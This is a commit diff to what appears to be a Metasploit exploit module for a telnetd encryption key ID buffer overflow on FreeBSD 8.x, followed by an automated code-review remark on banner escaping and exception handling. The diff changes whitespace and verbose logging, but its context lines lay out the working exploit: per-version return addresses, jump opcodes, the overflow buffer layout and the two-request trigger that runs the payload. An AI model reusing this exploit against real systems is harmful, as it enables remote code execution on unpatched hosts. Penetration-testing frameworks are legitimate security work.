Whitespace cleanup, also change print_status usage when verbose
parent
2f9d563067
commit
03a39f7fe8
|
@ -15,7 +15,7 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Telnet
|
||||
include Msf::Exploit::BruteTargets
|
||||
|
||||
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Automatic', { } ],
|
||||
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
|
||||
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
|
||||
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
|
||||
|
@ -63,10 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit_target(t)
|
||||
|
||||
|
||||
connect
|
||||
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
|
||||
print_status(banner_sanitized) if datastore['VERBOSE']
|
||||
vprint_status(banner_sanitized)
|
||||
|
||||
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
|
||||
enc_keyid = "\xff\xfa\x26\x07"
|
||||
|
@ -74,18 +74,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Telnet protocol requires 0xff to be escaped with another
|
||||
penc = payload.encoded.gsub("\xff", "\xff\xff")
|
||||
|
||||
|
||||
key_id = Rex::Text.rand_text_alphanumeric(400)
|
||||
key_id[ 0, 2] = "\xeb\x76"
|
||||
key_id[ 0, 2] = "\xeb\x76"
|
||||
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
|
||||
key_id[76, 4] = [ t['Ret'] ].pack("V")
|
||||
|
||||
key_id[76, 4] = [ t['Ret'] ].pack("V")
|
||||
|
||||
# Some of these bytes can get mangled, jump over them
|
||||
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)
|
||||
|
||||
|
||||
# Bounce to the real payload (avoid corruption)
|
||||
key_id[120, 2] = "\xeb\x46"
|
||||
|
||||
|
||||
# The actual payload
|
||||
key_id[192, penc.length] = penc
|
||||
|
||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Initiate encryption
|
||||
sock.put(enc_init)
|
||||
|
||||
|
||||
# Wait for a successful response
|
||||
loop do
|
||||
data = sock.get_once(-1, 5) rescue nil
|
||||
|
@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# The first request smashes the pointer
|
||||
print_status("Sending first payload")
|
||||
sock.put(sploit)
|
||||
|
||||
sock.put(sploit)
|
||||
|
||||
# Make sure the server replied to the first request
|
||||
data = sock.get_once(-1, 5)
|
||||
unless data
|
||||
|
@ -117,13 +117,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Some delay between each request seems necessary in some cases
|
||||
::IO.select(nil, nil, nil, 0.5)
|
||||
|
||||
|
||||
# The second request results in the pointer being called
|
||||
print_status("Sending second payload...")
|
||||
sock.put(sploit)
|
||||
|
||||
|
||||
handler
|
||||
|
||||
|
||||
::IO.select(nil, nil, nil, 0.5)
|
||||
disconnect
|
||||
end
|
||||
|
|
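Review bot: The banner written out in `exploit_target` is data supplied by the remote host, and nothing near the `vprint_status(banner_sanitized)` line records why it is first passed through `Rex::Text.to_hex_ascii`. A one-line comment above the assignment would stop a later cleanup from dropping the escaping: `# Banner is remote-controlled: hex-escape non-printable bytes so control sequences never reach the operator's console`. In the wait loop, the inline `rescue nil` on `sock.get_once(-1, 5)` swallows every StandardError, so a reset connection looks the same as a read that returned nothing. Naming the expected exception in a `begin`/`rescue` would make that distinction, though the loop body continues outside the visible hunk, so how `data` is used afterwards is inferred.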